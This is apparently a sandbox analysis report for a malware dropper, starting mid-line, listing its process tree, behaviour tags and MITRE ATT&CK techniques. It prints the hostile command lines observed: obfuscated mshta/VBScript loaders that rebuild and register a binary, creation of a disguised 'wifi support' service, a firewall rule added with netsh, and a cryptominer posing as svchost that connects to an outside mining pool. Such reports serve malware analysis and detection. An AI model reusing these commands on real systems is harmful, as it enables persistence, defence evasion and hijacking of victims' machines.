to memory of 1612 1208 Process not Found 42 PID 1208 wrote to memory of 1612 1208 Process not Found 42 PID 1208 wrote to memory of 1612 1208 Process not Found 42 PID 1208 wrote to memory of 1612 1208 Process not Found 42 PID 1208 wrote to memory of 1612 1208 Process not Found 42 PID 1208 wrote to memory of 2040 1208 Process not Found 43 PID 1208 wrote to memory of 2040 1208 Process not Found 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\EF3F.exeC:\Users\Admin\AppData\Local\Temp\EF3F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1108
-
C:\Users\Admin\AppData\Local\Temp\F26B.exeC:\Users\Admin\AppData\Local\Temp\F26B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1480
-
C:\Users\Admin\AppData\Local\Temp\4E60.exeC:\Users\Admin\AppData\Local\Temp\4E60.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\4E60.exeC:\Users\Admin\AppData\Local\Temp\4E60.exe2⤵
- Executes dropped EXE
PID:960
-
-
C:\Users\Admin\AppData\Local\Temp\52B5.exeC:\Users\Admin\AppData\Local\Temp\52B5.exe1⤵
- Executes dropped EXE
PID:664
-
C:\Users\Admin\AppData\Local\Temp\5564.exeC:\Users\Admin\AppData\Local\Temp\5564.exe1⤵
- Executes dropped EXE
PID:1140
-
C:\Users\Admin\AppData\Local\Temp\5E3C.exeC:\Users\Admin\AppData\Local\Temp\5E3C.exe1⤵
- Executes dropped EXE
PID:1004
-
C:\Users\Admin\AppData\Local\Temp\6657.exeC:\Users\Admin\AppData\Local\Temp\6657.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1668
-
C:\Users\Admin\AppData\Local\Temp\7537.exeC:\Users\Admin\AppData\Local\Temp\7537.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\7537.exeC:\Users\Admin\AppData\Local\Temp\7537.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1680
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1608
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1612
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2040
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2024
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1268
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:108
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1172
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1976
-
C:\Windows\system32\taskeng.exetaskeng.exe {16FCA353-E38A-4950-815A-D267C8DEA8A5} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵PID:820
-
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:432 -
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh3⤵
- Executes dropped EXE
PID:860
-
-
-
C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exeC:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exe --Task2⤵PID:1948
-
-
C:\Users\Admin\AppData\Roaming\ttcdbjhC:\Users\Admin\AppData\Roaming\ttcdbjh2⤵PID:1816
-
-
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh2⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\549E.exeC:\Users\Admin\AppData\Local\Temp\549E.exe1⤵
- Executes dropped EXE
PID:752 -
C:\Users\Admin\AppData\Local\Temp\549E.exeC:\Users\Admin\AppData\Local\Temp\549E.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
PID:1680 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:464
-
-
C:\Users\Admin\AppData\Local\Temp\549E.exe"C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of SetThreadContext
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\549E.exe"C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5FE5.exeC:\Users\Admin\AppData\Local\Temp\5FE5.exe1⤵
- Executes dropped EXE
PID:1852 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))2⤵PID:976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ) do taskkill -iM "%~NxE" -f3⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS4⤵
- Executes dropped EXE
PID:1768 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))5⤵PID:1544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f6⤵PID:1632
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt:clOSe (CreATeobJECT ("WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+ M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q * " , 0,TruE ) )5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
PID:752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2& COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q *6⤵PID:1232
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "7⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"7⤵PID:1392
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /u ..\FRKN5P.zE /S7⤵PID:1700
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "5FE5.exe" -f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\75E5.exeC:\Users\Admin\AppData\Local\Temp\75E5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:816 -
C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp"C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp" /SL5="$10196,188175,104448,C:\Users\Admin\AppData\Local\Temp\75E5.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec73⤵
- Executes dropped EXE
PID:2004 -
C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe"C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT4⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp" /SL5="$701B0,5808768,66560,C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT5⤵PID:2232
-
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵PID:2432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe"C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe"4⤵PID:2152
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵PID:2668
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:26⤵PID:2052
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1651722 /prefetch:26⤵PID:2640
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1258514 /prefetch:26⤵PID:2932
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1192997 /prefetch:26⤵PID:1684
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:930845 /prefetch:26⤵PID:1800
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵PID:2684
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514835⤵PID:2552
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515135⤵PID:2748
-
-
-
C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe"C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe"4⤵PID:2352
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onav1kxd.uqs\GcleanerEU.exe /eufive & exit5⤵PID:2940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqz1xsxi.nfw\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:1772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fulorq0w.bmj\google-game.exe & exit5⤵PID:2488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hilrvedo.wne\GcleanerWW.exe /mixone & exit5⤵PID:2936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe & exit5⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe6⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe7⤵PID:2672
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B788.exeC:\Users\Admin\AppData\Local\Temp\B788.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\B788.exe"C:\Users\Admin\AppData\Local\Temp\B788.exe"2⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\C2BF.exeC:\Users\Admin\AppData\Local\Temp\C2BF.exe1⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pbkldfrj\2⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uowakbcl.exe" C:\Windows\SysWOW64\pbkldfrj\2⤵PID:544
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create pbkldfrj binPath= "C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d\"C:\Users\Admin\AppData\Local\Temp\C2BF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:2060
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description pbkldfrj "wifi internet conection"2⤵PID:2096
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start pbkldfrj2⤵PID:2132
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:2176
-
-
C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exeC:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d"C:\Users\Admin\AppData\Local\Temp\C2BF.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2160 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2360 -
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\F65D.exeC:\Users\Admin\AppData\Local\Temp\F65D.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:2616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:2648
-
-
-
C:\Users\Admin\AppData\Local\Temp\A3C.exeC:\Users\Admin\AppData\Local\Temp\A3C.exe1⤵
- Executes dropped EXE
PID:2436
-
C:\Users\Admin\AppData\Local\Temp\F3FF.exeC:\Users\Admin\AppData\Local\Temp\F3FF.exe1⤵PID:2492
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Web Service
1